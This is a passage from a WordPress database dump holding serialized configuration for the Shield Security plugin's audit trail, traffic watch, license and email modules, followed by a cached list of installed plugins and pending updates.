trail\";s:4:\"name\";s:11:\"Audit Trail\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:11:\"audit_trail\";s:7:\"tagline\";s:56:\"Get a view on what happens on your site, when it happens\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:1;s:5:\"order\";i:110;}s:8:\"sections\";a:5:{i:0;a:5:{s:4:\"slug\";s:29:\"section_enable_audit_contexts\";s:7:\"primary\";b:1;s:5:\"title\";s:21:\"Enable Audit Contexts\";s:11:\"title_short\";s:14:\"Audit Contexts\";s:7:\"summary\";a:2:{i:0;s:65:\"Purpose - Specify which types of actions on your site are logged.\";i:1;s:67:\"Recommendation - These settings are dependent on your requirements.\";}}i:1;a:4:{s:4:\"slug\";s:27:\"section_audit_trail_options\";s:5:\"title\";s:19:\"Audit Trail Options\";s:11:\"title_short\";s:7:\"Options\";s:7:\"summary\";a:2:{i:0;s:61:\"Purpose - Provides finer control over the audit trail itself.\";i:1;s:67:\"Recommendation - These settings are dependent on your requirements.\";}}i:2;a:5:{s:4:\"slug\";s:23:\"section_change_tracking\";s:6:\"hidden\";b:1;s:5:\"title\";s:15:\"Change Tracking\";s:11:\"title_short\";s:15:\"Change Tracking\";s:7:\"summary\";a:2:{i:0;s:49:\"Purpose - Track significant changes to your site.\";i:1;s:55:\"Recommendation - Keep this Reporting feature turned on.\";}}i:3;a:4:{s:4:\"slug\";s:41:\"section_enable_plugin_feature_audit_trail\";s:5:\"title\";s:26:\"Enable Module: Audit Trail\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:124:\"Purpose - The Audit Trail is designed so you can look back on events and analyse what happened and what may have gone wrong.\";i:1;s:56:\"Recommendation - Keep the Audit Trail feature turned on.\";}}i:4;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:14:{i:0;a:9:{s:3:\"key\";s:18:\"enable_audit_trail\";s:7:\"section\";s:41:\"section_enable_plugin_feature_audit_trail\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/5p\";s:9:\"link_blog\";s:18:\"https://icwp.io/a1\";s:4:\"name\";s:18:\"Enable Audit Trail\";s:7:\"summary\";s:42:\"Enable (or Disable) The Audit Trail module\";s:11:\"description\";s:70:\"Un-Checking this option will completely disable the Audit Trail module\";}i:1;a:10:{s:3:\"key\";s:22:\"audit_trail_auto_clean\";s:7:\"section\";s:27:\"section_audit_trail_options\";s:7:\"default\";i:14;s:3:\"min\";i:1;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:18:\"https://icwp.io/a2\";s:9:\"link_blog\";s:18:\"https://icwp.io/a1\";s:4:\"name\";s:10:\"Auto Clean\";s:7:\"summary\";s:26:\"Enable Audit Auto Cleaning\";s:11:\"description\";s:94:\"Events older than the number of days specified will be automatically cleaned from the database\";}i:2;a:11:{s:3:\"key\";s:23:\"audit_trail_max_entries\";s:7:\"section\";s:27:\"section_audit_trail_options\";s:7:\"premium\";b:1;s:7:\"default\";i:1000;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"Max Trail Length\";s:7:\"summary\";s:34:\"Maximum Audit Trail Length To Keep\";s:11:\"description\";s:73:\"Automatically remove any audit trail entries when this limit is exceeded.\";}i:3;a:9:{s:3:\"key\";s:26:\"enable_audit_context_users\";s:7:\"section\";s:29:\"section_enable_audit_contexts\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/a3\";s:9:\"link_blog\";s:18:\"https://icwp.io/a1\";s:4:\"name\";s:16:\"Users And Logins\";s:7:\"summary\";s:39:\"Enable Audit Context - Users And Logins\";s:11:\"description\";s:95:\"When this context is enabled, the audit trail will track activity relating to: Users And Logins\";}i:4;a:9:{s:3:\"key\";s:28:\"enable_audit_context_plugins\";s:7:\"section\";s:29:\"section_enable_audit_contexts\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/a3\";s:9:\"link_blog\";s:18:\"https://icwp.io/a1\";s:4:\"name\";s:7:\"Plugins\";s:7:\"summary\";s:30:\"Enable Audit Context - Plugins\";s:11:\"description\";s:96:\"When this context is enabled, the audit trail will track activity relating to: WordPress Plugins\";}i:5;a:9:{s:3:\"key\";s:27:\"enable_audit_context_themes\";s:7:\"section\";s:29:\"section_enable_audit_contexts\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/a3\";s:9:\"link_blog\";s:18:\"https://icwp.io/a1\";s:4:\"name\";s:6:\"Themes\";s:7:\"summary\";s:29:\"Enable Audit Context - Themes\";s:11:\"description\";s:95:\"When this context is enabled, the audit trail will track activity relating to: WordPress Themes\";}i:6;a:9:{s:3:\"key\";s:26:\"enable_audit_context_posts\";s:7:\"section\";s:29:\"section_enable_audit_contexts\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/a3\";s:9:\"link_blog\";s:18:\"https://icwp.io/a1\";s:4:\"name\";s:15:\"Posts And Pages\";s:7:\"summary\";s:38:\"Enable Audit Context - Posts And Pages\";s:11:\"description\";s:120:\"When this context is enabled, the audit trail will track activity relating to: Editing and publishing of posts and pages\";}i:7;a:9:{s:3:\"key\";s:30:\"enable_audit_context_wordpress\";s:7:\"section\";s:29:\"section_enable_audit_contexts\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/a3\";s:9:\"link_blog\";s:18:\"https://icwp.io/a1\";s:4:\"name\";s:22:\"WordPress And Settings\";s:7:\"summary\";s:45:\"Enable Audit Context - WordPress And Settings\";s:11:\"description\";s:142:\"When this context is enabled, the audit trail will track activity relating to: WordPress upgrades and changes to particular WordPress settings\";}i:8;a:9:{s:3:\"key\";s:27:\"enable_audit_context_emails\";s:7:\"section\";s:29:\"section_enable_audit_contexts\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/a3\";s:9:\"link_blog\";s:18:\"https://icwp.io/a1\";s:4:\"name\";s:6:\"Emails\";s:7:\"summary\";s:29:\"Enable Audit Context - Emails\";s:11:\"description\";s:92:\"When this context is enabled, the audit trail will track activity relating to: Email Sending\";}i:9;a:9:{s:3:\"key\";s:25:\"enable_audit_context_wpsf\";s:7:\"section\";s:29:\"section_enable_audit_contexts\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/a4\";s:9:\"link_blog\";s:18:\"https://icwp.io/a1\";s:4:\"name\";s:6:\"Shield\";s:7:\"summary\";s:29:\"Enable Audit Context - Shield\";s:11:\"description\";s:85:\"When this context is enabled, the audit trail will track activity relating to: Shield\";}i:10;a:10:{s:3:\"key\";s:22:\"enable_change_tracking\";s:7:\"section\";s:23:\"section_change_tracking\";s:7:\"default\";s:8:\"disabled\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:7:\"enabled\";s:4:\"text\";s:7:\"Enabled\";}i:2;a:2:{s:9:\"value_key\";s:18:\"enabled_with_email\";s:4:\"text\";s:26:\"Enabled With Email Reports\";}}s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Enable Change Tracking\";s:7:\"summary\";s:32:\"Track Major Changes To Your Site\";s:11:\"description\";s:85:\"Tracking major changes to your site will help you monitor and catch malicious damage.\";}i:11;a:10:{s:3:\"key\";s:21:\"ct_snapshots_per_week\";s:7:\"section\";s:23:\"section_change_tracking\";s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:7;s:3:\"min\";i:1;s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Snapshot Per Week\";s:7:\"summary\";s:36:\"Number Of Snapshots To Take Per Week\";s:11:\"description\";s:72:\"The number of snapshots to take per week. For daily snapshots, select 7.\";}i:12;a:10:{s:3:\"key\";s:16:\"ct_max_snapshots\";s:7:\"section\";s:23:\"section_change_tracking\";s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:28;s:3:\"min\";i:1;s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Snapshot Per Week\";s:7:\"summary\";s:36:\"Number Of Snapshots To Take Per Week\";s:11:\"description\";s:72:\"The number of snapshots to take per week. For daily snapshots, select 7.\";}i:13;a:5:{s:3:\"key\";s:19:\"ct_last_snapshot_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}}s:11:\"definitions\";a:7:{s:10:\"db_classes\";a:1:{s:5:\"audit\";s:69:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\AuditTrail\\Handler\";}s:31:\"audit_trail_default_max_entries\";i:100;s:22:\"audit_trail_table_name\";s:11:\"audit_trail\";s:25:\"audit_trail_table_columns\";a:12:{i:0;s:2:\"id\";i:1;s:3:\"rid\";i:2;s:11:\"wp_username\";i:3;s:2:\"ip\";i:4;s:7:\"context\";i:5;s:5:\"event\";i:6;s:8:\"category\";i:7;s:7:\"message\";i:8;s:9:\"immutable\";i:9;s:4:\"meta\";i:10;s:10:\"created_at\";i:11;s:10:\"deleted_at\";}s:25:\"table_name_changetracking\";s:14:\"changetracking\";s:28:\"table_columns_changetracking\";a:5:{i:0;s:2:\"id\";i:1;s:4:\"data\";i:2;s:4:\"meta\";i:3;s:10:\"created_at\";i:4;s:10:\"deleted_at\";}s:6:\"events\";a:19:{s:16:\"plugin_activated\";a:2:{s:7:\"context\";s:7:\"plugins\";s:14:\"audit_multiple\";b:1;}s:18:\"plugin_deactivated\";a:2:{s:7:\"context\";s:7:\"plugins\";s:14:\"audit_multiple\";b:1;}s:18:\"plugin_file_edited\";a:1:{s:7:\"context\";s:7:\"plugins\";}s:15:\"theme_activated\";a:1:{s:7:\"context\";s:6:\"themes\";}s:17:\"theme_file_edited\";a:1:{s:7:\"context\";s:6:\"themes\";}s:12:\"core_updated\";a:1:{s:7:\"context\";s:9:\"wordpress\";}s:20:\"permalinks_structure\";a:1:{s:7:\"context\";s:9:\"wordpress\";}s:12:\"post_deleted\";a:2:{s:7:\"context\";s:5:\"posts\";s:14:\"audit_multiple\";b:1;}s:12:\"post_trashed\";a:2:{s:7:\"context\";s:5:\"posts\";s:14:\"audit_multiple\";b:1;}s:14:\"post_recovered\";a:2:{s:7:\"context\";s:5:\"posts\";s:14:\"audit_multiple\";b:1;}s:12:\"post_updated\";a:2:{s:7:\"context\";s:5:\"posts\";s:14:\"audit_multiple\";b:1;}s:14:\"post_published\";a:2:{s:7:\"context\";s:5:\"posts\";s:14:\"audit_multiple\";b:1;}s:16:\"post_unpublished\";a:2:{s:7:\"context\";s:5:\"posts\";s:14:\"audit_multiple\";b:1;}s:10:\"user_login\";a:1:{s:7:\"context\";s:5:\"users\";}s:15:\"user_registered\";a:1:{s:7:\"context\";s:5:\"users\";}s:12:\"user_deleted\";a:2:{s:7:\"context\";s:5:\"users\";s:14:\"audit_multiple\";b:1;}s:23:\"user_deleted_reassigned\";a:1:{s:7:\"context\";s:5:\"users\";}s:18:\"email_attempt_send\";a:2:{s:7:\"context\";s:6:\"emails\";s:14:\"audit_multiple\";b:1;}s:18:\"email_send_invalid\";a:2:{s:7:\"context\";s:6:\"emails\";s:14:\"audit_multiple\";b:1;}}}s:10:\"meta_modts\";i:1572181749;}'),(33639,1,'shield_mod_config_c74cdd6d3e4125689cbb0412a3fdbe84','a:7:{s:4:\"slug\";s:7:\"traffic\";s:10:\"properties\";a:13:{s:4:\"slug\";s:7:\"traffic\";s:4:\"name\";s:13:\"Traffic Watch\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:7:\"traffic\";s:7:\"tagline\";s:31:\"Watch All Requests To Your Site\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:110;}s:12:\"requirements\";a:1:{s:3:\"php\";a:1:{s:7:\"version\";s:3:\"5.4\";}}s:8:\"sections\";a:4:{i:0;a:5:{s:4:\"slug\";s:23:\"section_traffic_options\";s:7:\"primary\";b:1;s:5:\"title\";s:21:\"Traffic Watch Options\";s:11:\"title_short\";s:7:\"Options\";s:7:\"summary\";a:2:{i:0;s:62:\"Purpose - Provides finer control over the live traffic system.\";i:1;s:67:\"Recommendation - These settings are dependent on your requirements.\";}}i:1;a:4:{s:4:\"slug\";s:23:\"section_traffic_limiter\";s:5:\"title\";s:15:\"Traffic Limiter\";s:11:\"title_short\";s:7:\"Options\";s:7:\"summary\";a:2:{i:0;s:80:\"Purpose - Provides ability to restrict excessive requests from a single visitor.\";i:1;s:67:\"Recommendation - These settings are dependent on your requirements.\";}}i:2;a:4:{s:4:\"slug\";s:37:\"section_enable_plugin_feature_traffic\";s:5:\"title\";s:28:\"Enable Module: Traffic Watch\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:89:\"Purpose - The Traffic Watch module lets you monitor and review all requests to your site.\";i:1;s:103:\"Recommendation - Required only if you need to review and investigate and monitor requests to your site.\";}}i:3;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:9:{i:0;a:9:{s:3:\"key\";s:14:\"enable_traffic\";s:7:\"section\";s:37:\"section_enable_plugin_feature_traffic\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:18:\"https://icwp.io/ed\";s:9:\"link_blog\";s:18:\"https://icwp.io/ee\";s:4:\"name\";s:20:\"Enable Traffic Watch\";s:7:\"summary\";s:44:\"Enable (or Disable) The Traffic Watch Module\";s:11:\"description\";s:73:\"Un-Checking this option will completely disable the Traffic Watch module.\";}i:1;a:10:{s:3:\"key\";s:15:\"type_exclusions\";s:7:\"section\";s:23:\"section_traffic_options\";s:4:\"type\";s:15:\"multiple_select\";s:7:\"default\";a:4:{i:0;s:9:\"logged_in\";i:1;s:4:\"cron\";i:2;s:6:\"search\";i:3;s:6:\"uptime\";}s:13:\"value_options\";a:7:{i:0;a:2:{s:9:\"value_key\";s:6:\"simple\";s:4:\"text\";s:15:\"Simple Requests\";}i:1;a:2:{s:9:\"value_key\";s:3:\"api\";s:4:\"text\";s:8:\"REST API\";}i:2;a:2:{s:9:\"value_key\";s:4:\"ajax\";s:4:\"text\";s:4:\"AJAX\";}i:3;a:2:{s:9:\"value_key\";s:9:\"logged_in\";s:4:\"text\";s:15:\"Logged-In Users\";}i:4;a:2:{s:9:\"value_key\";s:4:\"cron\";s:4:\"text\";s:7:\"WP CRON\";}i:5;a:2:{s:9:\"value_key\";s:6:\"search\";s:4:\"text\";s:14:\"Search Engines\";}i:6;a:2:{s:9:\"value_key\";s:6:\"uptime\";s:4:\"text\";s:26:\"Uptime Monitoring Services\";}}s:9:\"link_info\";s:18:\"https://icwp.io/eb\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Traffic Log Exclusions\";s:7:\"summary\";s:41:\"Select Which Types Of Requests To Exclude\";s:11:\"description\";s:74:\"Deselect any requests that you don\'t want to appear in the traffic viewer.\";}i:2;a:9:{s:3:\"key\";s:17:\"custom_exclusions\";s:7:\"section\";s:23:\"section_traffic_options\";s:7:\"default\";a:0:{}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:18:\"https://icwp.io/ec\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Custom Exclusions\";s:7:\"summary\";s:33:\"Provide Custom Traffic Exclusions\";s:11:\"description\";s:98:\"For each entry, if the text is present in either the User Agent or Page/Path, it will be excluded.\";}i:3;a:10:{s:3:\"key\";s:10:\"auto_clean\";s:7:\"section\";s:23:\"section_traffic_options\";s:7:\"default\";i:3;s:3:\"min\";i:1;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Auto Expiry Cleaning\";s:7:\"summary\";s:30:\"Enable Traffic Log Auto Expiry\";s:11:\"description\";s:78:\"Automated DB cleanup will delete logs older than this maximum value (in days).\";}i:4;a:10:{s:3:\"key\";s:11:\"max_entries\";s:7:\"section\";s:23:\"section_traffic_options\";s:7:\"default\";i:1000;s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:14:\"Max Log Length\";s:7:\"summary\";s:34:\"Maximum Traffic Log Length To Keep\";s:11:\"description\";s:81:\"Automated DB cleanup will delete logs to maintain this maximum number of records.\";}i:5;a:9:{s:3:\"key\";s:12:\"auto_disable\";s:7:\"section\";s:23:\"section_traffic_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Auto Disable\";s:7:\"summary\";s:41:\"Auto Disable Traffic Logging After 1 Week\";s:11:\"description\";s:90:\"Turn on to prevent unnecessary long-term traffic logging. Timer resets each time you save.\";}i:6;a:10:{s:3:\"key\";s:14:\"limit_requests\";s:7:\"section\";s:14:\"section_non_ui\";s:7:\"default\";s:2:\"20\";s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Max Request Limit\";s:7:\"summary\";s:48:\"Maximum Number Of Requests Allowed In Time Limit\";s:11:\"description\";s:72:\"The maximum number of requests that are allowed in the given time limit.\";}i:7;a:10:{s:3:\"key\";s:15:\"limit_time_span\";s:7:\"section\";s:14:\"section_non_ui\";s:7:\"default\";s:2:\"20\";s:3:\"min\";i:0;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:27:\"Request Limit Time Interval\";s:7:\"summary\";s:48:\"The Time Interval To Test For Excessive Requests\";s:11:\"description\";s:84:\"The time limit within which to monitor for excessive requests that exceed the limit.\";}i:8;a:5:{s:3:\"key\";s:14:\"autodisable_at\";s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:7:\"integer\";s:12:\"transferable\";b:0;s:7:\"default\";i:0;}}s:11:\"definitions\";a:4:{s:10:\"db_classes\";a:1:{s:7:\"traffic\";s:66:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\Traffic\\Handler\";}s:18:\"traffic_table_name\";s:7:\"traffic\";s:21:\"traffic_table_columns\";a:11:{i:0;s:2:\"id\";i:1;s:3:\"rid\";i:2;s:3:\"uid\";i:3;s:2:\"ip\";i:4;s:4:\"path\";i:5;s:4:\"code\";i:6;s:2:\"ua\";i:7;s:4:\"verb\";i:8;s:5:\"trans\";i:9;s:10:\"created_at\";i:10;s:10:\"deleted_at\";}s:6:\"events\";a:1:{s:22:\"request_limit_exceeded\";a:2:{s:3:\"cat\";i:3;s:7:\"offense\";b:1;}}}s:10:\"meta_modts\";i:1572181753;}'),(33640,1,'shield_mod_config_8dd5e7ec26cc04af363eaeea739ef8d4','a:6:{s:4:\"slug\";s:7:\"license\";s:10:\"properties\";a:14:{s:4:\"slug\";s:7:\"license\";s:4:\"name\";s:12:\"Pro Security\";s:10:\"menu_title\";s:7:\"Go Pro!\";s:21:\"show_module_menu_item\";b:1;s:19:\"highlight_menu_item\";b:1;s:7:\"tagline\";s:44:\"The Best In WordPress Security, Only Better.\";s:12:\"auto_enabled\";b:1;s:11:\"storage_key\";s:7:\"license\";s:12:\"show_central\";b:0;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:1;}s:8:\"sections\";a:1:{i:0;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:12:{i:0;a:6:{s:3:\"key\";s:11:\"license_key\";s:7:\"section\";s:14:\"section_non_ui\";s:9:\"sensitive\";b:1;s:12:\"transferable\";b:0;s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}i:1;a:5:{s:3:\"key\";s:20:\"license_activated_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:2;a:5:{s:3:\"key\";s:22:\"license_deactivated_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:3;a:5:{s:3:\"key\";s:23:\"license_last_checked_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:4;a:5:{s:3:\"key\";s:26:\"license_deactivated_reason\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}i:5;a:5:{s:3:\"key\";s:26:\"last_warning_email_sent_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:6;a:5:{s:3:\"key\";s:30:\"last_deactivated_email_sent_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:7;a:5:{s:3:\"key\";s:11:\"last_errors\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";s:0:\"\";}i:8;a:6:{s:3:\"key\";s:13:\"last_error_at\";s:7:\"section\";s:14:\"section_non_ui\";s:9:\"sensitive\";b:1;s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:9;a:6:{s:3:\"key\";s:20:\"keyless_request_hash\";s:7:\"section\";s:14:\"section_non_ui\";s:9:\"sensitive\";b:1;s:12:\"transferable\";b:0;s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}i:10;a:6:{s:3:\"key\";s:18:\"keyless_request_at\";s:7:\"section\";s:14:\"section_non_ui\";s:9:\"sensitive\";b:1;s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:11;a:6:{s:3:\"key\";s:12:\"license_data\";s:7:\"section\";s:14:\"section_non_ui\";s:9:\"sensitive\";b:1;s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}}s:11:\"definitions\";a:13:{s:17:\"license_store_url\";s:35:\"https://onedollarplugin.com/edd-sl/\";s:10:\"keyless_cp\";s:18:\"https://icwp.io/c5\";s:17:\"license_item_name\";s:19:\"Shield Security Pro\";s:15:\"license_item_id\";s:4:\"6047\";s:20:\"license_item_name_sc\";s:40:\"Shield Security Pro (via Shield Central)\";s:18:\"license_item_id_sc\";s:3:\"968\";s:22:\"lic_verify_expire_days\";i:7;s:28:\"lic_verify_expire_grace_days\";i:3;s:18:\"license_key_length\";i:32;s:16:\"license_key_type\";s:12:\"alphanumeric\";s:7:\"keyless\";b:1;s:24:\"keyless_handshake_expire\";i:90;s:6:\"events\";a:3:{s:17:\"lic_check_success\";a:1:{s:4:\"stat\";b:0;}s:14:\"lic_fail_email\";a:1:{s:4:\"stat\";b:0;}s:19:\"lic_fail_deactivate\";a:2:{s:3:\"cat\";i:2;s:4:\"stat\";b:0;}}}s:10:\"meta_modts\";i:1572181753;}'),(33641,1,'shield_mod_config_497e588a3bca2bdbbb100a510c9e3231','a:5:{s:4:\"slug\";s:5:\"email\";s:10:\"properties\";a:10:{s:4:\"slug\";s:5:\"email\";s:4:\"name\";s:5:\"Email\";s:21:\"show_module_menu_item\";b:0;s:12:\"auto_enabled\";b:1;s:11:\"storage_key\";s:5:\"email\";s:12:\"show_central\";b:0;s:7:\"premium\";b:0;s:17:\"access_restricted\";b:1;s:18:\"run_if_whitelisted\";b:1;s:12:\"run_if_wpcli\";b:1;}s:8:\"sections\";a:2:{i:0;a:3:{s:4:\"slug\";s:21:\"section_email_options\";s:5:\"title\";s:13:\"Email Options\";s:7:\"primary\";b:1;}i:1;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:1:{i:0;a:9:{s:3:\"key\";s:25:\"send_email_throttle_limit\";s:7:\"section\";s:21:\"section_email_options\";s:7:\"default\";i:10;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Email Throttle Limit\";s:7:\"summary\";s:23:\"Limit Emails Per Second\";s:11:\"description\";s:183:\"You throttle emails sent by this plugin by limiting the number of emails sent every second. This is useful in case you get hit by a bot attack. Zero (0) turns this off. Suggested: 10.\";}}s:10:\"meta_modts\";i:1572181749;}'),(34560,1,'_site_transient_timeout_theme_roots','1573738734'),(34561,1,'_site_transient_theme_roots','a:1:{s:8:\"onepress\";s:7:\"/themes\";}'),(34562,1,'_site_transient_update_plugins','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1573765742;s:7:\"checked\";a:35:{s:19:\"akismet/akismet.php\";s:5:\"4.1.2\";s:51:\"all-in-one-wp-migration/all-in-one-wp-migration.php\";s:3:\"7.8\";s:43:\"all-in-one-seo-pack/all_in_one_seo_pack.php\";s:6:\"3.2.10\";s:51:\"all-in-one-wp-security-and-firewall/wp-security.php\";s:5:\"4.4.2\";s:16:\"gotmls/index.php\";s:7:\"4.18.76\";s:59:\"black-studio-tinymce-widget/black-studio-tinymce-widget.php\";s:5:\"2.6.9\";s:33:\"classic-editor/classic-editor.php\";s:3:\"1.5\";s:37:\"disable-comments/disable-comments.php\";s:6:\"1.10.2\";s:35:\"disable-xml-rpc/disable-xml-rpc.php\";s:5:\"1.0.1\";s:53:\"disable-xml-rpc-pingback/disable-xml-rpc-pingback.php\";s:5:\"1.2.1\";s:23:\"elementor/elementor.php\";s:5:\"2.7.4\";s:53:\"famethemes-demo-importer/famethemes-demo-importer.php\";s:5:\"1.1.2\";s:36:\"google-sitemap-generator/sitemap.php\";s:5:\"4.1.0\";s:21:\"hello-dolly/hello.php\";s:5:\"1.7.2\";s:29:\"ip-geo-block/ip-geo-block.php\";s:8:\"3.0.17.4\";s:41:\"better-wp-security/better-wp-security.php\";s:5:\"7.4.1\";s:19:\"jetpack/jetpack.php\";s:3:\"7.8\";s:63:\"limit-login-attempts-reloaded/limit-login-attempts-reloaded.php\";s:5:\"2.9.0\";s:23:\"loginizer/loginizer.php\";s:5:\"1.4.2\";s:35:\"login-recaptcha/login-nocaptcha.php\";s:5:\"1.6.4\";s:25:\"maxbuttons/maxbuttons.php\";s:6:\"7.13.1\";s:31:\"onepress-plus/onepress-plus.php\";s:5:\"2.1.6\";s:59:\"remove-xmlrpc-pingback-ping/remove-xmlrpc-pingback-ping.php\";s:3:\"1.1\";s:32:\"wp-simple-firewall/icwp-wpsf.php\";s:5:\"8.2.3\";s:23:\"wp-smushit/wp-smush.php\";s:5:\"3.3.1\";s:38:\"swift-performance-lite/performance.php\";s:5:\"2.1.1\";s:27:\"updraftplus/updraftplus.php\";s:7:\"1.16.17\";s:43:\"visual-form-builder/visual-form-builder.php\";s:5:\"3.0.1\";s:23:\"wordfence/wordfence.php\";s:5:\"7.4.0\";s:23:\"wp-cerber/wp-cerber.php\";s:3:\"8.5\";s:39:\"wp-file-manager/file_folder_manager.php\";s:3:\"5.4\";s:24:\"wpforms-lite/wpforms.php\";s:5:\"1.5.6\";s:55:\"wp-geo-website-protection/wp-geo-website-protection.php\";s:3:\"2.6\";s:29:\"wp-mail-smtp/wp_mail_smtp.php\";s:5:\"1.7.0\";s:24:\"wordpress-seo/wp-seo.php\";s:4:\"12.3\";}s:8:\"response\";a:13:{s:19:\"akismet/akismet.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:21:\"w.org/plugins/akismet\";s:4:\"slug\";s:7:\"akismet\";s:6:\"plugin\";s:19:\"akismet/akismet.php\";s:11:\"new_version\";s:5:\"4.1.3\";s:3:\"url\";s:38:\"https://wordpress.org/plugins/akismet/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/plugin/akismet.4.1.3.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:59:\"https://ps.w.org/akismet/assets/icon-256x256.png?rev=969272\";s:2:\"1x\";s:59:\"https://ps.w.org/akismet/assets/icon-128x128.png?rev=969272\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:61:\"https://ps.w.org/akismet/assets/banner-772x250.jpg?rev=479904\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:3:\"5.3\";s:12:\"requ